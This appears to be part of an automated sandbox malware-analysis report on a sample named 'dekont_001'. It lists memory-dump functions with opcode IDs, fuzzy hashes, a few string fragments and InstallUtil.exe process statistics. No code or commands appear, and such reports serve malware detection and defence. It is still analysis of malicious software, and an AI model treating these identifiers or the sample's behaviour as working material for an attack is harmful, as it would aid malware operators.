Function 07102B37 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9588895cbe995a4def0fd9647ae1c97136e03ac3b23045816c9e29b40235f80c
Instruction ID: 7f54a8301f0bc7d6f96427af03a1b1e5e6bb11bcd8ce8515f8027c16eece89b7
Opcode Fuzzy Hash: 9588895cbe995a4def0fd9647ae1c97136e03ac3b23045816c9e29b40235f80c
Instruction Fuzzy Hash: 5D111774A50629CFCB64DF18C998B9AB7B1FB0D310F0041E4E419A7784DB349E84CF42

Function 026E1BC9 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff627820986e44b9962bd52c119942ae9e68ea0a0dab40df6d525117aa4a5df
Instruction ID: 82494b2acd776deba9b861712e3189f448b66250a297b79a49ee0b6b819ecfa6
Opcode Fuzzy Hash: dff627820986e44b9962bd52c119942ae9e68ea0a0dab40df6d525117aa4a5df
Instruction Fuzzy Hash: 6CF0E2313096840FD311472E9820B53BFEAAFCA65471880AAF04DC7366DA60EC018750

Function 026E0C18 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56a106e512ab4625719ee89704376b001b5349fe57f7a09dde0cd668053d7e0b
Instruction ID: 783b79eac9534dfb088aa0556b4f8d92d6366493efbae6b14b2082fef1681b21
Opcode Fuzzy Hash: 56a106e512ab4625719ee89704376b001b5349fe57f7a09dde0cd668053d7e0b
Instruction Fuzzy Hash: 69F0BE30E00119ABCB04EBB9C4452DEBBB5AF80300F1080B5D90697398EE34AB55CBC0

Function 026E1BD8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92430c5d12f4928ed80cf8de2e9fdbacbe97bc8569169c93d353739493af53d9
Instruction ID: 9db02739e45efd59c5bc08e0cc4bcd10269e511e216e838f82f1babcfa6dac71
Opcode Fuzzy Hash: 92430c5d12f4928ed80cf8de2e9fdbacbe97bc8569169c93d353739493af53d9
Instruction Fuzzy Hash: 91E09A327046045FE314864E9C44F47BBEEEBC8760B24806AF20DCB364EAB0EC0186A0

Function 026E0ABA Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d73e9503a8e8c5dc95b7ece42b36899d8a579d515f8c3fa60773f5b5281d476f
Instruction ID: 809d9f05e88e0b576073de6efe7db40278460338ca92cb0ab0f305d703ba6918
Opcode Fuzzy Hash: d73e9503a8e8c5dc95b7ece42b36899d8a579d515f8c3fa60773f5b5281d476f
Instruction Fuzzy Hash: 20F0A03090E3C49FC703DB78AA710ACBFB1AE4321075945DAD485D7263C6312E16DB91

Function 07104176 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ceb3139930ee326b744c74f8993f7bad36a9c75d6c963283d132c27522af2c3
Instruction ID: ca44020e8fc386943feb7e404a01f0a20ddf7a56574fd020ed9326e6a58205c8
Opcode Fuzzy Hash: 6ceb3139930ee326b744c74f8993f7bad36a9c75d6c963283d132c27522af2c3
Instruction Fuzzy Hash: A7F08C70A091188FC724DF29D9AC6AA77A2DF8A200F2180D5910AAB2C1CF345E89CF61

Function 026E07B8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6828593e4f3aed5952ec8a001704fa68cce1e9c1d6c800a78658beb46c15f4b5
Instruction ID: 502e1faa9c839386f0cee511135e377be2b86d8f288774eb39b55e09e23d359f
Opcode Fuzzy Hash: 6828593e4f3aed5952ec8a001704fa68cce1e9c1d6c800a78658beb46c15f4b5
Instruction Fuzzy Hash: 04E01A5240E7D15FDB170B7849720D67F70AD5321430E50C3D0DACBAA3D649995AD726

Function 026EF1B0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f01b9d1b7cbb2301a9cc6c7b1c4004c2fb9983d9f371b1c764e730ca6295bf1
Instruction ID: f68dfc35c15bce89f2c24dbb1edd37f4edd3077ea6a1d43a7a22d1d614f77338
Opcode Fuzzy Hash: 4f01b9d1b7cbb2301a9cc6c7b1c4004c2fb9983d9f371b1c764e730ca6295bf1
Instruction Fuzzy Hash: 7BF06C7490E248AFC705DBA4DC119ADBF78DB45305F14909EAC4557241C6315945DB51

Function 0711A958 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction ID: 99b6da104ae2d1efc3179257f7dd5d668d6cc20d5b5e928eecf16b22cca4a138
Opcode Fuzzy Hash: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction Fuzzy Hash: 1FE0C9B4E05208EFCB44DFE8D84169CBFF4EB48310F10C1AA980897340D735AA51DF50

Function 071079D6 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c273c59e3f8e41ec47864f08137bdd32cdd768c37e0d8e590a31c581dd5a6b
Instruction ID: db718aa7d505b1a24076875d08aa19fc94a32c16200da5863cbff931ff228530
Opcode Fuzzy Hash: f7c273c59e3f8e41ec47864f08137bdd32cdd768c37e0d8e590a31c581dd5a6b
Instruction Fuzzy Hash: 0CF0A474A41615CFCB14DF58CD58A9A77B5FB88341F0401D5E90A973C5DB30AE44CF90

Function 07116028 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction ID: c09c5d81ebb06ba98bf4034734f1cd0edc079dd96cfa2a362d6a6109c6f600d1
Opcode Fuzzy Hash: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction Fuzzy Hash: 51E0C9B4E05208EFCB54DFA8D4416ACBBF4EB48310F10C1AA980897340DB36AA51DF40

Function 0711BE88 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction ID: 392bde13c80756cd4ceaef3c8ce359861aef2b377352ee0f2860da23a50e6769
Opcode Fuzzy Hash: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction Fuzzy Hash: 59E0EDB4E09208EFCB54DFA8D44169DFBF4EB48310F10C1AAA809A7340D731AA51DF40

Function 0711DED8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction ID: 4f39c48e6027bd510c3abaf477617a054e5fa87200b36a0c064b70ddc6fad4c3
Opcode Fuzzy Hash: 06f015d3168558755e19333e18dd8a57dfeff9456d96ba0cf1048530f199ba92
Instruction Fuzzy Hash: 89E0EDB4E05208EFCB44DFA8D44169DFBF4EB58311F10C1AA9849A7340D731AA51DF41

Function 07106CC2 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4501548c9325d0bbbb1885ffb76646a271563d6a24048e4d7c35aa9a38407e9
Instruction ID: 063645b1a9ec2b5c5cf5e25138f42015fe191fc4d70b696ea5fa1c088e95dfac
Opcode Fuzzy Hash: e4501548c9325d0bbbb1885ffb76646a271563d6a24048e4d7c35aa9a38407e9
Instruction Fuzzy Hash: 2FF0DAB4650259DFCB14DF58CA98A9A77B2FB48300F1044D4E509A7388DB74AE84DF90

Function 026EF72E Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e55d33870de531247458d2f13eec1269dee46f3f2b8dddae4c0a434ab344ed2
Instruction ID: 00c39ae86f9276a699a6f753ffbd3cbb5ef0d1ed76152867bc4b849da5dcef70
Opcode Fuzzy Hash: 6e55d33870de531247458d2f13eec1269dee46f3f2b8dddae4c0a434ab344ed2
Instruction Fuzzy Hash: 88E0ED74D05108EBCB44DFA5E4429ADBFB8EB49314F14C1AAA84553341C6316A52DF95

Function 0711F6F8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6453defafc1347118b17a96c4a6bded784c87b40f62e5b92be131a64c013d06
Instruction ID: af27692229bb440759b301895a0e52426d53f19a43094b7356334f9930a77c11
Opcode Fuzzy Hash: c6453defafc1347118b17a96c4a6bded784c87b40f62e5b92be131a64c013d06
Instruction Fuzzy Hash: 37E0ED74E05208EFCB44DFA8D44169CFBF5EB48300F10C1A9D80897340D7316A46CF40

Function 026EF1C0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef53adb096c8201f8e193c4ff25b0363792706eadad188d1a14a1b177a34612
Instruction ID: 9e9159973ef59fd2fb6a90864c042e9b57e8c8c1d5e8e583a12b14e13254abf5
Opcode Fuzzy Hash: 5ef53adb096c8201f8e193c4ff25b0363792706eadad188d1a14a1b177a34612
Instruction Fuzzy Hash: E3E0867490910CEBCB04DFD4D8419ADBFB8AB45311F14D199EC4557341C732AA52DF94

Function 026EF730 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3217778bdea7719f5f85b6be95186bdc75eac3ec727260851e138f90ea7dd272
Instruction ID: da80261e04523da3d7a62cfcd5c3b222a42c9261a5b2d91e4525cc3748dae819
Opcode Fuzzy Hash: 3217778bdea7719f5f85b6be95186bdc75eac3ec727260851e138f90ea7dd272
Instruction Fuzzy Hash: B1E01A74D05208EFCF44DFA8E4429ACFBB4EB48310F14C1AAEC4563341C631AA52DF84

Function 07118D30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00df35773670b1a044948d217752053cdb67b3a04a8042714908db59315eaae
Instruction ID: 0a5023caa00a6af3182c6b5ddda7a335d6ea78040a2da22f4e993f87ce221d27
Opcode Fuzzy Hash: a00df35773670b1a044948d217752053cdb67b3a04a8042714908db59315eaae
Instruction Fuzzy Hash: 85E01AB4D05208EBCB44DB98D4415ACBBB4AB49310F14C1AA98185B381C631AA41DF41

Function 0711E450 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0daa24ab990f2668679da03d99363a0a0d793b7c9064faf443bbffa3c2ca064e
Instruction ID: a33fda5c1db6a011d87dd99de2b6ae5c46a1f97f6815291e91e4ea9fcfd984b5
Opcode Fuzzy Hash: 0daa24ab990f2668679da03d99363a0a0d793b7c9064faf443bbffa3c2ca064e
Instruction Fuzzy Hash: 5DE0EC74D09108DBCB04DBE4E5415ACBBB5AB49316F1491A99C0857381CB316E5ADF85

Function 0711B858 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e418198c73130eef0133f4cee824009df1e999f44821d1cc118cd592bc4098e3
Instruction ID: f9ef65e6c162b700b8f0de4933c6c5f0b4b15c50086e0c586e6489407d8471ec
Opcode Fuzzy Hash: e418198c73130eef0133f4cee824009df1e999f44821d1cc118cd592bc4098e3
Instruction Fuzzy Hash: B8E02BB1C4110CDBCB80FFF5C81069E7BF8DF04300F0045AAD40597110EE32DA509B9A

Function 026E0AD0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94c42f048c48348f5cc471f2ba530eaa475b9c0bdb83e4317e625c32958442c
Instruction ID: c0975f4b0a4a15e3a23ca8c89704954bceb05e7be3da92b4da8314fc77c62a3a
Opcode Fuzzy Hash: b94c42f048c48348f5cc471f2ba530eaa475b9c0bdb83e4317e625c32958442c
Instruction Fuzzy Hash: 02D01730A41208EF8B00EFA8EA0555DBBB9EB84214BA085A9E409D3310EA316F009BD1

Function 026E32D1 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84e58067211b8bb08ac946e4cab5db0a51836b855ca653af9f55a4736760152
Instruction ID: 153c75f7c0c2f4f5d12290b2ac08249e644a4879a00b2257cdd5fa9e02ca2744
Opcode Fuzzy Hash: f84e58067211b8bb08ac946e4cab5db0a51836b855ca653af9f55a4736760152
Instruction Fuzzy Hash: 7EC08C3374A2548FAB0419A8BC880ACF314F68833A304167FE00A86300CB3100584780

Function 0711E8F8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bef2dfc289b10ddd37171a0a36120fb6f4b99d780531c95280718176208f143
Instruction ID: d1be27f434d9976c5808cd0e6c4bd939e2e9ff38c727967977518abfa138f1ad
Opcode Fuzzy Hash: 7bef2dfc289b10ddd37171a0a36120fb6f4b99d780531c95280718176208f143
Instruction Fuzzy Hash: 7BC02BB088B30D82C38816C4700C3743BDCC383313F883C21690C05091CBA020ACCA14

Function 0710185C Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b748a444ed53ad3993785ed687508c0330b9afdcf23db5e94f94c57dffc985b
Instruction ID: 82b8524dba4e56a4a191c330689ca04350746b52a0b19f98a666ebab6f9c564b
Opcode Fuzzy Hash: 2b748a444ed53ad3993785ed687508c0330b9afdcf23db5e94f94c57dffc985b
Instruction Fuzzy Hash: BBD02230250108CBC314EF84D5ACBAB3362E78A300F004080A00E433C8DB345E48CF61

Function 026E09B1 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09047cec585ac833b88d1351425f7c62ee81ab425ab278fe3140f347b6e0427d
Instruction ID: 17f0838dee1d48823e3be4ed46852cf12308b8dcddc8438a337b67575d400a67
Opcode Fuzzy Hash: 09047cec585ac833b88d1351425f7c62ee81ab425ab278fe3140f347b6e0427d
Instruction Fuzzy Hash: 34C0928790A2C48FC2070BF81DB62C13FB0DCAB04538C04C2C882CE1A3B1185507B2A2

Function 026E0850 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9c615318c477bcb2eb7be46b36e8727291870ddc83643a3750a27c7933384b
Instruction ID: db3c14c7922fae649f773a4254936f0d50bd917bc9e0a614eafeb0721976418c
Opcode Fuzzy Hash: 3d9c615318c477bcb2eb7be46b36e8727291870ddc83643a3750a27c7933384b
Instruction Fuzzy Hash: B1902232080A0C8B020023C0B008008B30C80003003800002A00C028028E2330200088

Non-executed Functions

Function 026EE631 Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

4'kq, xrefs: 026EE6F7
4'kq, xrefs: 026EE722

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: a5b3a584d75f8d89289a39e2a86096ad76651b031218acc3a2532bb500c5a64c
Instruction ID: df755e816f3dbe40910ffbec35e0ddd7a3c6f77d04f0f2351234a0d264053e02
Opcode Fuzzy Hash: a5b3a584d75f8d89289a39e2a86096ad76651b031218acc3a2532bb500c5a64c
Instruction Fuzzy Hash: 2E714D70E01A049FD708DFAAE98569EBBF3BF84301F14D96AD0059B3A9EF346945CB50

Function 026EE640 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'kq, xrefs: 026EE6F7
4'kq, xrefs: 026EE722

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: 2c2a5b9aef60ccc8cb8ed07f1624a72c307c440b6f0784dca88cf54166b441b6
Instruction ID: 93990909acf935e8f75bb81cde4d8fa726045cd28172dadee551ad88f1d4d93a
Opcode Fuzzy Hash: 2c2a5b9aef60ccc8cb8ed07f1624a72c307c440b6f0784dca88cf54166b441b6
Instruction Fuzzy Hash: 37714D70E01A049FD708DFAAE98169EBBF3BF84300F14D96AD0049B3A9EF346945CB50

Function 0711E490 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4343fa043ec727875a78a2cfc4f4468b241ae756de584bcf72f7d48c43b826
Instruction ID: 09afea8479b8b7bd92966e21f432a9f09daf295be8b9b3a3bb0d4f441c777cb7
Opcode Fuzzy Hash: fc4343fa043ec727875a78a2cfc4f4468b241ae756de584bcf72f7d48c43b826
Instruction Fuzzy Hash: EF9107B4E15218CFEB68DFA9C84479DBBF1BF4A305F1480B9C909AB280DB755989CF41

Function 07100007 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 103f5f10465da10b4240f08a55ec68553404cb6439d5bde05b2ac4ca01f65125
Instruction ID: 04966de68a2cfa883fc2a730e4cce6f1947b005292f3ffbe5c7370efee948c74
Opcode Fuzzy Hash: 103f5f10465da10b4240f08a55ec68553404cb6439d5bde05b2ac4ca01f65125
Instruction Fuzzy Hash: 04315971D057958FD72ACF6A8C153CABBF6AF8A200F09C0EAC448AA166DB7409858F50

Function 07100040 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df720a14f11c54966a56c0710865900c851c035f270ccd3315dfe32e179f2af
Instruction ID: 86dd5068afa069c7197f44ba84848ed120167dfca28f959c07cea518e49e5d6b
Opcode Fuzzy Hash: 9df720a14f11c54966a56c0710865900c851c035f270ccd3315dfe32e179f2af
Instruction Fuzzy Hash: 9F21CCB1D046298BEB28CF5BCC5539AFAF7AF89300F04C0EA941CA6254EB704A859F40

Function 026E4439 Relevance: 7.5, Strings: 6, Instructions: 11COMMON

Download Yara Rule

Strings

$kq, xrefs: 026E4610
jjjjjj, xrefs: 026E4558
TJpq, xrefs: 026E5B2A
$kq, xrefs: 026E45FA
*), xrefs: 026E5A93
TJpq, xrefs: 026E45CE

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
API String ID: 0-998880824
Opcode ID: 233ba35b195fad298d1aba8d3d5aa093d70c21c9e1adefaf22d90c29fc738bfe
Instruction ID: d2c74c69451ce542255886308e113495c124120d1ec1f56a18090486027811cf
Opcode Fuzzy Hash: 233ba35b195fad298d1aba8d3d5aa093d70c21c9e1adefaf22d90c29fc738bfe
Instruction Fuzzy Hash: 66C0CA1050F3D0CECF030A3888A02303E60AE62260319A0DAD4824B447DA288487E327

Function 026E5855 Relevance: 6.3, Strings: 5, Instructions: 35COMMON

Download Yara Rule

Strings

4'kq, xrefs: 026E5885
4, xrefs: 026E58B0
TJpq, xrefs: 026E5B2A
4'kq, xrefs: 026E5899
*), xrefs: 026E5A93

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: *)$4$4'kq$4'kq$TJpq
API String ID: 0-3472178802
Opcode ID: 9097e0645aa8830ce7156cf26abda4b61ab906a163151895df01c9f4f6169714
Instruction ID: 9940c89a691b1735b335070f0133a2fe74c98642fdfad39d9c8815993e97181a
Opcode Fuzzy Hash: 9097e0645aa8830ce7156cf26abda4b61ab906a163151895df01c9f4f6169714
Instruction Fuzzy Hash: C9F09070B412188FD7289A7D491476F79DB7BCC304F309098A10AAB3E8DF39ED468791

Function 026E57DA Relevance: 5.0, Strings: 4, Instructions: 34COMMON

Download Yara Rule

Strings

$kq, xrefs: 026E580A
TJpq, xrefs: 026E5B2A
*), xrefs: 026E5A93
$kq, xrefs: 026E57DA

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: *)$TJpq$$kq$$kq
API String ID: 0-2724558860
Opcode ID: aeafdc4426e95c7e2bc9bd1dce501b06456631727d8ba95cc4266c861e33f0b3
Instruction ID: a66392dc7c3b056d20d04df85e8a361b0256cb02b1057d3578113446be922b32
Opcode Fuzzy Hash: aeafdc4426e95c7e2bc9bd1dce501b06456631727d8ba95cc4266c861e33f0b3
Instruction Fuzzy Hash: C1F0B470B412188FD32CE73D491472F29DB6BCC300F205459610AAB3D5DD39DC824791

Function 026E4489 Relevance: 5.0, Strings: 4, Instructions: 5COMMON

Download Yara Rule

Strings

$kq, xrefs: 026E4610
jjjjjj, xrefs: 026E4558
$kq, xrefs: 026E45FA
TJpq, xrefs: 026E45CE

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: TJpq$jjjjjj$$kq$$kq
API String ID: 0-2568102283
Opcode ID: f7146fba6ddcdf01cc0842ddc7b8f5fc44f599cea825f99eaa8902cb09b9f3f1
Instruction ID: 070040ca995ffd7382b7f68fc869735e9ad6ce7aac62bc679add8ed7814ab329
Opcode Fuzzy Hash: f7146fba6ddcdf01cc0842ddc7b8f5fc44f599cea825f99eaa8902cb09b9f3f1
Instruction Fuzzy Hash: DFA02230000000CECB0AEE80CCC0A303328FF8230AB38C0AAC00B8F200C330C0CACB22

Analysis Process: InstallUtil.exePID: 7452, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	15.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	26.4%
